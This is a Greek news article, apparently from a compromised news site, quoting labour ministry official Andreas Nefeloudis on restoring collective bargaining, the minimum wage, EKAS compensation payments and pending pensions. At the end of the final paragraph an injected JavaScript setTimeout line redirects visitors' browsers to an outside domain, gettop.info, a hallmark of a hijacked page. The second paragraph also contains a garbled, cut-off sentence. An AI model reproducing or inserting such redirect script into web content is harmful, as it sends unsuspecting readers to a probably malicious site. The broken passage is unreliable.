Νεφελούδης: Στόχος να επανέλθουν οι συλλογικές συμβάσεις εργασίας

0
17

 

Στόχος της κυβέρνησης είναι να επανέλθουν οι συλλογικές συμβάσεις εργασίας και μάλιστα, να υπερισχύουν οι κλαδικές συμβάσεις, τόνισε ο γενικός γραμματέας του υπουργείου Εργασίας, Ανδρέας Νεφελούδης.

Μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού/ Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9fm», ανέφερε πως «έχουμε μια τεράστια συμμαχία εταίρων για τα εργασιακά» είπε στον ο . Τόνισε πως στόχος

Ο ίδιος εξήγησε πως μετά την επιστροφή των συμβάσεων εργασίας, θα διευκολυνθεί και ο έλεγχος του υπουργείου και του ΣΕΠΕ για το σύνολο της αγοράς εργασίας, ώστε κάποια στιγμή να μπει τέλος στην εργασιακή «ζούγκλα».

Ερωτηθείς για τον κατώτατο μισθό, στο πλαίσιο και των διαπραγματεύσεων με τους θεσμούς, ο κ. Νεφελούδης επέμεινε στην πάγια θέση της κυβέρνησης ότι ο μισθός πρέπει να είναι αποτέλεσμα διαπραγμάτευσης μεταξύ των κοινωνικών εταίρων και όχι απόφαση ενός υπουργού, όπως ισχύει σήμερα.

Ο κ. Νεφελούδης, μέσα από το «Πρακτορείο 104,9fm», ανακοίνωσε ότι από αύριο, 22 Νοεμβρίου, το υπουργείο Εργασίας θα πιστώσει στους λογαριασμούς των δικαιούχων τα αντισταθμιστικά για το ΕΚΑΣ και μάλιστα με αναδρομική ισχύ. Παράλληλα, ο γενικός γραμματέας του υπουργείου Εργασίας, ανακοίνωσε πως 21 εκατομμύρια έχουν δεσμευτεί για να αρχίσει η σταδιακή καταβολή των ΕΦΑΠΑΞ, ενώ ενημέρωσε ότι σταδιακά ξεκινά και η καταβολή των συντάξεων που εκκρεμούν εδώ και 3 χρόνια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here